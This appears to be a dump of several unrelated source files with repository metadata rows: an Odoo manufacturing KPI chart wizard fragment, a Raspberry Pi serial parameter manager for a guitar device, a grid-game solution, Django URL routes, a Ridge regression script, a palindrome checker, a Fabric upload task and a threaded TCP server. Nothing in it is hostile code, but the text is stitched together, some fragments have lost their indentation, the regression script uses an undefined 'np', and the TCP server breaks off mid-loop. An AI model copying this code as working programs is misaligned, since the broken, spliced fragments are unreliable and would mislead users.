self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'5', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'6', 'point': 0, 'quantity': 0})
#get report 3d line
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
                        for _setting_report_id in _setting_report_ids:
                            _setting_report = self.pool.get('hpusa.setting.report.line').browse(cr, uid, _setting_report_id)
if _setting_report.product_id.setting_difficulty_level:
level = _setting_report.product_id.setting_difficulty_level.name
if level == 'I':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'1', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'II':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'2', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'III':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'3', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'IV':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'V':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'5', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'VI':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'6', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_setting_productivity_graph')
else:
_setting_ids = self.pool.get('hp.kpis.view.chart.setting.compare').search(cr, uid, [])
if(_setting_ids):
self.pool.get('hp.kpis.view.chart.setting.compare').unlink(cr, uid, _setting_ids)
if(obj.option == 'month'):
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
                    # work out the date range of each week
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
for _setting_report_id in _setting_report_ids:
setting = self.pool.get('hpusa.setting.report.line').browse(cr, uid, _setting_report_id)
self.pool.get('hp.kpis.view.chart.setting.compare').create(cr, uid, {'name': 'Week '+str(i),'point': setting.point, 'quantity': 1 * setting.complete,'employee_id': setting.worker.id})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _setting_report_id in _setting_report_ids:
setting = self.pool.get('hpusa.setting.report.line').browse(cr, uid, _setting_report_id)
self.pool.get('hp.kpis.view.chart.setting.compare').create(cr, uid, {'name': month.name,'point': setting.point, 'quantity': 1 * setting.complete, 'employee_id': setting.worker.id})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_setting_compare_graph')
id = res and res[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
result['target'] = 'current'
return result
wizard_hp_report_chart_kpis_setting()
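# --- Editor's hedged note -----------------------------------------------------
# All four wizards finish the same way: resolve an act_window XML id with
# get_object_reference, read it, and force target='current'.  A minimal sketch
# of that shared tail, assuming `xml_id` is one of the graph actions referenced
# above:
#
#   res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', xml_id)
#   act_id = res and res[1] or False
#   action = act_obj.read(cr, uid, [act_id], context=context)[0]
#   action['target'] = 'current'
#   return action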
| UTF-8 | Python | false | false | 54,504 | py | 89 | wizard_hp_report_kpis_chart.py | 47 | 0.522567 | 0.514366 | 0 | 701 | 76.74465 | 263 |
alexmlucas/i1 | 12,824,772,355,851 | f080f88cd75f5556828288bbad3e329c4116e3da | 66e7978eb51f74ddd9b5f8d9ecbf35617b982da3 | /rpi_script/parameter_manager.py | 8c41a765184115a80fd59cd976740882cbe0539a | []
| no_license | https://github.com/alexmlucas/i1 | aa0ef1b98d5f2449bc69a14f7822beca9c3628f4 | 154fcc72b2ab87c1bf3f1f5ba2baf20b025223f2 | refs/heads/master | 2021-10-10T10:31:20.236306 | 2019-09-12T13:54:17 | 2019-09-12T13:54:17 | 158,238,900 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import serial
import csv
from subprocess import call
class Parameter_Manager:
def __init__(self, port, baud_rate):
self.port = port
self.baud_rate = baud_rate
self.song_data_path = "/home/pi/i1/rpi_script/song_data.txt"
self.global_data_path = "/home/pi/i1/rpi_script/global_data.txt"
        # Initialise class variables from saved parameter values
self.current_song = self.get_global_parameter('b')
self.master_level = self.float_value_generator(self.get_global_parameter('a'))
self.backing_level = self.float_value_generator(self.get_song_parameter('e'))
self.guitar_level = self.midi_value_generator(self.get_song_parameter('d'))
        # Initialise serial port
self.control_board = serial.Serial(self.port, self.baud_rate, timeout = 0.1)
# Flush inputs and outputs
self.control_board.flushInput()
self.control_board.flushOutput()
# Flag for indicating that bluetooth reconnection has been requested.
# Initialise with a value of True to ensure wristband connection is attempted on program start.
self.reconnect_wristband_flag = True
def midi_value_generator(self, value_to_convert):
# convert values between 0 - 10 to vaues between 0 - 127
return (value_to_convert / 10) * 127
def float_value_generator(self, value_to_convert):
return value_to_convert / 10
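    # Editor's note (hedged example): with the 0-10 values stored in the data
    # files, midi_value_generator(5) returns 63.5 and float_value_generator(7)
    # returns 0.7; callers cast to int where a MIDI byte is required.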
def set_song_player(self, song_player):
# Create a local reference to the song player.
self.song_player = song_player
# Now that a reference to the song player is available, set the song...
self.song_player.set_song(self.get_global_parameter('b'))
# ...and set its level
self.song_player.set_level(self.backing_level * self.master_level)
def set_guitar(self, guitar):
# Create a local reference to the guitar.
self.guitar = guitar
# Now that a reference to the guitar is available, set its path...
self.guitar.set_sound_font(self.get_song_parameter('c'))
# ... and its level
self.guitar.set_level(int(self.guitar_level * self.master_level))
#### Set scales ####
# Red scale
self.guitar.set_zone_notes(0, self.get_song_parameter('f'))
# Green scale
self.guitar.set_zone_notes(1, self.get_song_parameter('g'))
# Blue scale
self.guitar.set_zone_notes(2, self.get_song_parameter('h'))
#### Set transpositions ####
# Red transposition
self.guitar.set_transposition(0, self.get_song_parameter('i'))
# Green transposition
self.guitar.set_transposition(1, self.get_song_parameter('j'))
# Blue transposition
self.guitar.set_transposition(2, self.get_song_parameter('k'))
def check_incoming(self):
# Read data from the serial port
incoming_serial = self.control_board.readline().rstrip().decode()
# Flush the serial port
self.control_board.flushInput()
if incoming_serial:
print(incoming_serial)
            if incoming_serial[0] == 'a':
# Master level (Global Parameter)
# Convert incoming string to a float value
value_as_float = self.float_value_generator(self.get_number_from_string(incoming_serial))
# Set the master level
self.master_level = value_as_float
# Change the level of the song player
self.song_player.set_level(self.backing_level * self.master_level)
# Change the level of the guitar
self.guitar.set_level(int(self.guitar_level * self.master_level))
# Write the parameter
self.write_global_parameter(incoming_serial)
            elif incoming_serial[0] == 'b':
# Song (Global Parameter)
# Write the parameter
self.write_global_parameter(incoming_serial)
# Update the current song
self.current_song = int(incoming_serial[2])
# Update local variables
self.backing_level = self.float_value_generator(self.get_song_parameter('e'))
self.guitar_level = self.midi_value_generator(self.get_song_parameter('d'))
# Act on changes to parameter values
self.song_player.set_song(self.current_song)
self.song_player.set_level(self.backing_level * self.master_level)
self.guitar.set_level(int(self.guitar_level * self.master_level))
self.guitar.set_sound_font(self.get_song_parameter('c'))
self.guitar.set_zone_notes(0, self.get_song_parameter('f'))
self.guitar.set_zone_notes(1, self.get_song_parameter('g'))
self.guitar.set_zone_notes(2, self.get_song_parameter('h'))
self.guitar.set_transposition(0, self.get_song_parameter('i'))
self.guitar.set_transposition(1, self.get_song_parameter('j'))
self.guitar.set_transposition(2, self.get_song_parameter('k'))
# Transmit the song data
self.song_data_requested()
            elif incoming_serial[0] == 'c':
# Guitar
# Set the sound font by removing the first two characters from the incoming serial string and converting to int
self.guitar.set_sound_font(int(incoming_serial[1:]))
# Write the parameter
self.write_song_parameter(incoming_serial)
            elif incoming_serial[0] == 'd':
# Guitar Level
# convert incoming string to midi value
midi_value = self.midi_value_generator(self.get_number_from_string(incoming_serial))
# Set the backing level local value
self.guitar_level = midi_value
# actually change the volume
self.guitar.set_level(int(self.guitar_level * self.master_level))
# Write the parameter
self.write_song_parameter(incoming_serial)
            elif incoming_serial[0] == 'e':
# Backing Level
# convert incoming string to float value
value_as_float = self.float_value_generator(self.get_number_from_string(incoming_serial))
# Set the backing level local value
self.backing_level = value_as_float
# actually change the volume
self.song_player.set_level(self.backing_level * self.master_level)
# Write the parameter
self.write_song_parameter(incoming_serial)
            elif incoming_serial[0] == 'f':
# Red Scale
# Get the scale value
scale_value = int(incoming_serial[2]) + (int(incoming_serial[1]) * 10)
# Set the scale
self.guitar.set_zone_notes(0, scale_value)
# Write the parameter
self.write_song_parameter(incoming_serial)
            elif incoming_serial[0] == 'g':
# Green Scale
# Get the scale value
scale_value = int(incoming_serial[2]) + (int(incoming_serial[1]) * 10)
# Set the scale
self.guitar.set_zone_notes(1, scale_value)
# Write the parameter
self.write_song_parameter(incoming_serial)
            elif incoming_serial[0] == 'h':
# Blue Scale
# Get the scale value
scale_value = int(incoming_serial[2]) + (int(incoming_serial[1]) * 10)
# Set the scale
self.guitar.set_zone_notes(2, scale_value)
# Write the parameter
self.write_song_parameter(incoming_serial)
            elif incoming_serial[0] == 'i':
# Red Root
# Get the value
transposition_value = int(incoming_serial[2]) + (int(incoming_serial[1]) * 10)
# Set the scale
self.guitar.set_transposition(0, transposition_value)
# Write the parameter
self.write_song_parameter(incoming_serial)
            elif incoming_serial[0] == 'j':
# Green Root
# Get the value
transposition_value = int(incoming_serial[2]) + (int(incoming_serial[1]) * 10)
# Set the scale
self.guitar.set_transposition(1, transposition_value)
# Write the parameter
self.write_song_parameter(incoming_serial)
            elif incoming_serial[0] == 'k':
# Blue Root
# Get the value
transposition_value = int(incoming_serial[2]) + (int(incoming_serial[1]) * 10)
# Set the scale
self.guitar.set_transposition(2, transposition_value)
# Write the parameter
self.write_song_parameter(incoming_serial)
            elif incoming_serial[0] == 'l':
# Zone
# Write the parameter
self.write_song_parameter(incoming_serial)
            elif incoming_serial[0] == 'm':
# Reconnect Request
self.reconnect_wristband_flag = True
            elif incoming_serial[0] == 'n':
# Power
# Local action
self.shutdown_device(incoming_serial)
            elif incoming_serial[0] == 'o':
# Play
self.song_player.set_play_state(int(incoming_serial[2]))
            elif incoming_serial[0] == 'r':
# Initial data request.
# Send the global parameters
self.global_data_requested()
# Send the song data
self.song_data_requested()
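    # --- Editor's summary (inferred from the branches above) -----------------
    # Each serial message is a single command character followed by two digits,
    # e.g. 'a05' sets the master level to 5 on the 0-10 scale.  Commands seen
    # in check_incoming():
    #   a master level    b song select     c guitar sound font   d guitar level
    #   e backing level   f/g/h red/green/blue scale   i/j/k red/green/blue root
    #   l zone            m reconnect wristband        n power off
    #   o play state      r initial data request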
def shutdown_device(self, incoming_serial):
print('Shutting down')
#call("sudo shutdown -h now", shell=True)
def write_song_parameter(self, incoming_serial):
# Indicates whether or not a parameter has been found in the list.
write_flag = False
# Creates a list containing 5 lists, each of 8 items, all set to 0
w, h = 4, 9;
song_data_as_list = [[0 for x in range(w)] for y in range(h)]
'''print("before data added")
with open('song_data.txt') as csv_file:
song_data = csv.reader(csv_file, delimiter = ',')
for row in song_data:
print(row[current_song])'''
with open(self.song_data_path) as csv_file:
song_data_reader = csv.reader(csv_file, delimiter = ',')
# Convert the song data to a list so that we can easily work with it.
song_data_as_list = list(song_data_reader)
# Initialise an index variable for use with the following for loop
index = 0
# Interate through the song data list
for index, row in enumerate(song_data_as_list):
# Isolate the parameter associated with the currently selected song
cell_string = row[self.current_song]
# If the first character matches that of the incoming serial...
if(incoming_serial[0] == cell_string[0]):
#... indicate that we need to overwrite the parameter in this position.
write_flag = True
break
# If the write flag is true...
if write_flag == True:
#... overwrite the parameter in the array.
song_data_as_list[index][self.current_song] = incoming_serial
# and write the data to the song data text file.
with open(self.song_data_path, mode='w') as csv_file:
song_data_writer = csv.writer(csv_file, delimiter = ',')
song_data_writer.writerows(song_data_as_list)
'''print("after data added")
with open('song_data.txt') as csv_file:
song_data = csv.reader(csv_file, delimiter = ',')
for row in song_data:
print(row[current_song])'''
def write_global_parameter(self, incoming_serial):
# Indicates whether or not a parameter has been found in the list.
write_flag = False
# Create a 2 x 1 array, initialised to 0
w, h = 2, 1;
global_data_as_list = [[0 for x in range(w)] for y in range(h)]
'''print("before data added")
with open('global_data.txt') as csv_file:
global_data_reader = csv.reader(csv_file, delimiter = ',')
global_data_as_list = list(global_data_reader)
print(global_data_as_list)'''
with open(self.global_data_path) as csv_file:
global_data_reader = csv.reader(csv_file, delimiter = ',')
# Convert the global data to a list so that we can easily work with it.
global_data_as_list = list(global_data_reader)
# initialise index's for iterating through the following for loop.
row_index = 0
cell_index = 0
for row_index, row in enumerate(global_data_as_list):
for cell_index, cell_string in enumerate(row):
# If the first character matches that of the incoming serial...
if(incoming_serial[0] == cell_string[0]):
#... indicate that we need to overwrite the parameter in this position.
write_flag = True
break
# Exit the parent for loop
if(write_flag == True):
break
# If the write flag is true...
if write_flag == True:
#... overwrite the parameter in the array.
global_data_as_list[row_index][cell_index] = incoming_serial
# and write the data to the song data text file.
with open(self.global_data_path, mode='w') as csv_file:
global_data_writer = csv.writer(csv_file, delimiter = ',')
global_data_writer.writerows(global_data_as_list)
'''print("after data added")
with open('global_data.txt') as csv_file:
global_data_reader = csv.reader(csv_file, delimiter = ',')
global_data_as_list = list(global_data_reader)
print(global_data_as_list)'''
def global_data_requested(self):
with open(self.global_data_path) as csv_file:
global_data = csv.reader(csv_file, delimiter = ',')
# Nasty hack to get global data sent.
# Will need to be changed if more data is added to the text file
for row in global_data:
byte_array = bytes(row[0], 'utf-8')
self.control_board.write(byte_array)
byte_array = bytes(row[1], 'utf-8')
self.control_board.write(byte_array)
def song_data_requested(self):
with open(self.song_data_path) as csv_file:
song_data = csv.reader(csv_file, delimiter = ',')
for row in song_data:
                # the stored parameter is already a string; encode it once for the serial port
                song_parameter = row[self.current_song]
                print(song_parameter)
                self.control_board.write(song_parameter.encode())
'''def get_last_selected_song(self):
# create a 2 x 1 array
w, h = 2, 1;
global_data_as_list = [[0 for x in range(w)] for y in range(h)]
with open('global_data.txt') as csv_file:
global_data_reader = csv.reader(csv_file, delimiter = ',')
global_data_as_list = list(global_data_reader)
row_index = 0
cell_index = 0
for row_index, row in enumerate(global_data_as_list):
for cell_index, cell_string in enumerate(row):
if(cell_string[0] == 'b'):
# song parameter found
return int(cell_string[2])'''
def get_global_parameter(self, parameter_character):
# create a 2 x 1 array
w, h = 2, 1;
global_data_as_list = [[0 for x in range(w)] for y in range(h)]
with open(self.global_data_path) as csv_file:
global_data_reader = csv.reader(csv_file, delimiter = ',')
global_data_as_list = list(global_data_reader)
row_index = 0
cell_index = 0
for row_index, row in enumerate(global_data_as_list):
for cell_index, cell_string in enumerate(row):
# If the first character matches...
if(parameter_character == cell_string[0]):
#... return the value
return int(cell_string[2]) + (int(cell_string[1]) * 10)
def get_song_parameter(self, parameter_character):
# Indicates whether or not a parameter has been found in the list.
write_flag = False
# Creates a list containing 5 lists, each of 8 items, all set to 0
w, h = 4, 9;
song_data_as_list = [[0 for x in range(w)] for y in range(h)]
'''print("before data added")
with open('song_data.txt') as csv_file:
song_data = csv.reader(csv_file, delimiter = ',')
for row in song_data:
print(row[current_song])'''
with open(self.song_data_path) as csv_file:
song_data_reader = csv.reader(csv_file, delimiter = ',')
# Convert the song data to a list so that we can easily work with it.
song_data_as_list = list(song_data_reader)
# Initialise an index variable for use with the following for loop
index = 0
        # Iterate through the song data list
for index, row in enumerate(song_data_as_list):
# Isolate the parameter associated with the currently selected song
cell_string = row[self.current_song]
# If the first character matches...
if(parameter_character == cell_string[0]):
#... return the value
return int(cell_string[2]) + (int(cell_string[1]) * 10)
def get_number_from_string(self, string_value):
return int(string_value[2]) + (int(string_value[1]) * 10)
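    # Illustrative example (editor's addition; the marker-plus-two-digits layout is inferred from
    # the decoding above, not from any project documentation): a parameter string such as 'v27'
    # decodes to int('7') + int('2') * 10 == 27, i.e.
    #   self.get_number_from_string('v27')  # -> 27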
def tx_wristband_connection_attempt(self):
character_to_transmit = 'p00'
self.control_board.write(character_to_transmit.encode())
def tx_wristband_success(self):
character_to_transmit = 'q00'
self.control_board.write(character_to_transmit.encode())
def tx_wristband_failure(self):
character_to_transmit = 'r00'
self.control_board.write(character_to_transmit.encode())
| UTF-8 | Python | false | false | 15,850 | py | 49 | parameter_manager.py | 37 | 0.67123 | 0.66183 | 0 | 463 | 33.226782 | 115 |
kyrs/hackerank-solution | 12,206,297,088,703 | f3a005badda087592dccd0c572e82ac986771aa2 | 4265c94c924f0086a8541d7d768db1b73a9982ed | /Artificial Intelligence/save_princess_2/princess2.py | c5938aa2073bd2e208d9086dcecf2d4e5375296d | []
| no_license | https://github.com/kyrs/hackerank-solution | f27972af9d234a48102f187fc23d7d4bd06f15bb | 8c3ba62802dcc8a487b91f19961839af14a26984 | refs/heads/master | 2021-01-10T08:04:39.980852 | 2016-01-17T14:30:55 | 2016-01-17T14:30:55 | 49,046,311 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | ''' Coded by Kumar Shubham
Date : 6-Jan-2016'''
#!/bin/python
class SavePrincess(object):
def __init__(self,m, grid):
self.SizeMatrix = m
self.GridMatrix = grid
self.PrincessCordinate = None
self.BotCordinate = None
self.PrincessMarker = "p"
self.BotMarker = "m"
def ValidRow(self):
return self.SizeMatrix == len(self.GridMatrix)
def ValidCol(self):
CorrectFlag =True
for row in self.GridMatrix:
if not len(row) == self.SizeMatrix:
Exception("Wrong column !!")
CorrectFlag = False
break
return CorrectFlag
def ValidMatrix(self):
RowValid = self.ValidRow()
ColumnValid = self.ValidCol()
return (RowValid and ColumnValid)
def FindCoordinate(self, marker) :
CoordPoint =[]
for i,row in enumerate(self.GridMatrix):
for j,col in enumerate(row):
if col == marker :
CoordPoint = [i,j]
if len(CoordPoint) == 0 :
Exception("%s Marker not Found "%(marker))
return CoordPoint
def PrincessCoordinate(self):
return self.FindCoordinate(self.PrincessMarker)
def BotCoordinate(self):
return self.FindCoordinate(self.BotMarker)
def nextMove(n,r,c,grid):
Grid = SavePrincess(n,grid)
Grid.BotCoordinate = [r,c]
BotPosition = [r,c]
if not Grid.ValidMatrix() :
Exception ("Matrix is invalid !!!")
else:
PrincessPosition = Grid.PrincessCoordinate()
PrincessPosition[0] = BotPosition[0]-PrincessPosition[0]
PrincessPosition[1] = BotPosition[1]-PrincessPosition[1]
#BotPosition = [0,0]
BotX = 0
BotY = 0
PrincessY = PrincessPosition[0]
PrincessX = PrincessPosition[1]
#Xdepth = BotX-PrincessX
#Ydepth = BotY-PrincessY
PathDistance = [abs(PrincessX),abs(PrincessY)]
PathChoose = min(PathDistance)
IndexMinPath = PathDistance.index(PathChoose)
if (PathChoose == 0):
IndexMinPath = not IndexMinPath
if IndexMinPath == False :
if (PrincessX>0):
Turn = "LEFT"
else :
Turn = "RIGHT"
if IndexMinPath== True :
if (PrincessY>0):
Turn = "UP"
else:
Turn = "DOWN"
return Turn
n = input()
r,c = [int(i) for i in raw_input().strip().split()]
grid = []
for i in xrange(0, n):
grid.append(raw_input())
print nextMove(n,r,c,grid) | UTF-8 | Python | false | false | 2,676 | py | 9 | princess2.py | 8 | 0.548954 | 0.540732 | 0 | 122 | 20.942623 | 64 |
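# Quick sanity check (editor's sketch, not part of the original submission): with the bot at
# row 1, col 1 and the princess at row 2, col 0 of a 3x3 grid, the greedy rule above moves one
# step toward her along the chosen axis:
#   nextMove(3, 1, 1, ['---', '-m-', 'p--'])  # -> 'LEFT'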
iamsaptorshe07/TRAVMAKS-Old | 15,547,781,648,692 | 7ccaafb941555a508caa36e70a4cf3a85ff36cf4 | 6596113cfc5a4d19a1edbb1bc93cb0d43af67a6d | /travelagency/urls.py | 74ad76a2e5f25837ff7cd7ab06ac51b454d2a68d | []
| no_license | https://github.com/iamsaptorshe07/TRAVMAKS-Old | 3fe7cbb603264ab3513439a42eec8843af859daa | e0159ae8e7cd1c77e6475df77cc9dc769c7d4bd2 | refs/heads/main | 2023-07-01T21:08:36.931079 | 2021-07-31T08:26:11 | 2021-07-31T08:26:11 | 333,350,933 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.urls import path
from .views import *
from .tests import *
urlpatterns = [
path('myagency/<agid>',travelagency_home,name='travelAgencyHome'),
path('myagency/addtour/<int:uid>/<str:agid>',addTour,name='addTour'),
path('agencytours/<int:uid>/<str:agid>',agencyTours,name='agencyTour'),
path('agencytours/edit-tour/<str:agentId>/<str:tourId>',editTours,name='editTours'),
path('agencytours/delete-tour/<agentId>/<tourId>',deleteteTour,name='deleteteTour'),
path('booking-history/<agentId>',booking_history,name='bookingHistory'),
path('upcoming-tours/<agentId>',upcoming_tours,name='upcomingTours'),
path('ongoing-tours/<agentId>',ongoing_tours,name='ongoingTours'),
path('notifications',bookingNotification,name='bookingNotification'),
path('accept-package-booking-order/<orderId>',acceptOrder,name='acceptOrder'),
path('decline-package-booking-order/<orderId>',declineOrder,name='declineOrder'),
path('travmaks-partner/<agencyID>',agencyTourShare,name='AgencyPage'),
path('test-url',testpage,name='testURL'),
] | UTF-8 | Python | false | false | 1,073 | py | 123 | urls.py | 60 | 0.730662 | 0.730662 | 0 | 18 | 58.666667 | 88 |
anhnda/gformstats | 13,056,700,599,124 | 82902775297df8b311c39ac01468ff48e2a0d9f9 | 622eea38f1fb1c4bedddf26c1c5904c078339eef | /data/final_responses/IT4866_20132546/20132546_RR.py | e04cdcc1d11de7650748039ac8d4c556d13ce4db | []
| no_license | https://github.com/anhnda/gformstats | 4aec7ee2d325caabbf65cd5b72fdb4eab9d13c25 | 5e1ae2a600464f50185b887c7efa906e85b4cad6 | refs/heads/master | 2019-03-20T05:29:10.599530 | 2018-03-05T07:28:22 | 2018-03-05T07:28:22 | 105,976,418 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from sklearn.preprocessing import scale
from sklearn import metrics
import numpy
import csv
# Trích ma trận X và vector y từ file dữ liệu đã cho
Xy = numpy.loadtxt("/home/mable/Desktop/python/training-data.csv", dtype=float ,delimiter=",", skiprows=1)
Xy1 = numpy.loadtxt("/home/mable/Desktop/python/20132546-test.csv", dtype=float ,delimiter=",")
X = Xy[:, 0:-1]
X = scale(X)
y = Xy[:, -1]
y -= y.mean()
X_train = X
y_train = y
X_test = Xy1[:, 0:-1]
X_test = scale(X_test)
# Tính w với alpha = 0.5 với Ridge
from sklearn.linear_model import Ridge
rreg = Ridge(alpha=0.5, normalize=True)
rreg.fit(X_train, y_train)
rreg.coef_
preds = rreg.predict(X_test)
# print 'RMSE (Ridge reg.) =', np.sqrt(metrics.mean_squared_error(y_test, preds))
# sử dụng RidgeCV để tìm alpha tốt nhất
from sklearn.linear_model import RidgeCV
alpha_range = 10.**np.arange(-2, 3)
rregcv = RidgeCV(normalize=True, scoring='mean_squared_error', alphas=alpha_range)
rregcv.fit(X_train, y_train)
rregcv.alpha_
preds = rregcv.predict(X_test)
# print 'RMSE (Ridge CV reg.) =', np.sqrt(metrics.mean_squared_error(y_test, preds))
# Giá trị y_test
print preds
# in ra giá trị alpha tốt nhất
print rregcv.alpha_
# GHi giá trị y_test vào file csv
r = csv.reader(open('/home/mable/Desktop/python/20132546-test.csv')) # Here your csv file
lines = [l for l in r]
for i in range(0,10):
lines[i][8] = preds[i]
writer = csv.writer(open('/home/mable/Desktop/python/20132546test.csv', 'w'))
writer.writerows(lines)
| UTF-8 | Python | false | false | 1,540 | py | 503 | 20132546_RR.py | 109 | 0.700067 | 0.670675 | 0 | 49 | 29.55102 | 106 |
marcelopederiva/CodeSignal | 12,481,174,963,129 | 8cb856cc2e73a3cd1d64a5bac63968fe5be30103 | 6372a2de8c0d904504cc004b5bddddf47e6ae44b | /Arcade_Intro/checkPalindrome.py | 04632dedbd0d641450c08652e6e371373017e58f | []
| no_license | https://github.com/marcelopederiva/CodeSignal | 8d9fee5908403316b72adfa44c01daefd80501e9 | b5006caa47cbe4dbaf05f175abd7cb75ba81ee83 | refs/heads/master | 2021-05-21T19:00:23.046352 | 2020-04-03T14:58:27 | 2020-04-03T14:58:27 | 252,754,653 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def checkPalindrome(inputString):
if list(inputString) == list(inputString)[::-1]:
return True
else:
return False
| UTF-8 | Python | false | false | 149 | py | 57 | checkPalindrome.py | 57 | 0.583893 | 0.577181 | 0 | 5 | 26.6 | 52 |
zzlyzq/speeding | 9,002,251,489,632 | 52a68bb591bfd7fdfcf6ab8057a3d2d04e68b8f4 | c5c71eb1011f53a6e878b91ca02eebdba5e06c37 | /funcs/mgmt.py | e50a5c87fc11b064517954c5c6022b20805fd07a | []
| no_license | https://github.com/zzlyzq/speeding | 4458dc4443ed5f548952a874f9aa8d1dd75f19c6 | fc8f61660910c9cba8979b368f146efb76d5810b | refs/heads/master | 2021-01-19T13:49:52.179935 | 2017-04-13T01:43:09 | 2017-04-13T01:43:09 | 88,112,397 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*
from fabric.api import *
from fabric.context_managers import *
from fabric.contrib.console import confirm
from fabric.contrib.files import *
from fabric.contrib.project import rsync_project
import fabric.operations
import time,os
import logging
import base64
from getpass import getpass
import json
import sys
# 定义一些常量
## 本地软件目录
env.local_softdir="/opt/software/"
## 远端软件目录
env.remote_softdir="/opt/software/"
## 远端家目录
env.remote_dir="/opt/machtalk/"
############# MGMT START 管理机器部署
@task
@roles('mgmt')
def files_upload():
#filenames=[ 'addons.tar.gz', 'erlang.tar.gz', 'haproxy.tar.gz', 'mariadb-10.1.16-linux-x86_64.tar.gz', 'mq.tar.gz', 'openfalcon.tar.gz', 'rd.tar.gz', 'solrcloud.tar.gz', 'cloudera-manager-el6-cm5.5.0_x86_64.tar.gz', 'fastdfs.tar.gz', 'kafka_2.12-0.10.2.0.tar.gz', 'mongodb-linux-x86_64-2.6.11.tar.gz', 'nginx.tar.gz', 'rabbitmq_server-3.6.5.tar.gz', 'redis-2.8.23.tar.gz', 'zookeeper-3.4.7.tar.gz', 'CDH-5.5.0-1.cdh5.5.0.p0.8-el6.parcel', 'CDH-5.5.0-1.cdh5.5.0.p0.8-el6.parcel.sha', 'others' ]
filenames=[ 'addons.tar.gz' ]
for filename in filenames:
# TODO 如果dst dir 不存在,那么就自动创建
put(env.local_softdir+filename,env.remote_softdir) | UTF-8 | Python | false | false | 1,297 | py | 21 | mgmt.py | 20 | 0.702391 | 0.64798 | 0 | 33 | 35.787879 | 496 |
mattf4171/ComputerNetworks | 17,506,286,700,518 | 1ce68967663adcbf5a8a7bcb9e5e8e42e54d7918 | 684407cc2a451ae36aa996bdc35eb52d27339b73 | /TCP_threadedServer/serverTCP.py | 3d42ae53fc61e145ed94105db4add2ee612c92f9 | []
| no_license | https://github.com/mattf4171/ComputerNetworks | bc1162979b84c7521f67b5a14b507301ad71dcc1 | 06adc719f38867120682feca4268277d680c4f7c | refs/heads/main | 2023-04-09T18:39:50.840666 | 2021-04-05T00:04:01 | 2021-04-05T00:04:01 | 354,667,527 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 4 16:27:09 2021
@author: matthewfernandez
"""
from socket import *
import threading
i = 0
sentences = [] # will append the messages in the empty array then dispay them in the order they were received
def catch_msg(socket, name):
global i, sentences
sentences.append(socket.recv(1024).decode())
msg = name + " Sent message: " + sentences[i] # format for each client program running
print(msg)
i += 1
serverPort = 12000
serverSocket = socket(AF_INET, SOCK_STREAM)
serverSocket.bind(("",serverPort))
serverSocket.listen(2) # listen for 2 client connections
print("The server is ready to receive")
while True:
connectionSocketX,addrX = serverSocket.accept() # First connection
print("Accepted first connection, calling it connection X")
connectionSocketX.send("Client X connected".encode())
connectionSocketY,addrY = serverSocket.accept() # Second connection
print("Accepted second connection, calling it connection Y")
connectionSocketY.send("Client Y connected".encode())
print("\nWaiting to receive messages from client X and client Y\n")
t1 = threading.Thread(target=catch_msg,args = (connectionSocketX,"Client X"))
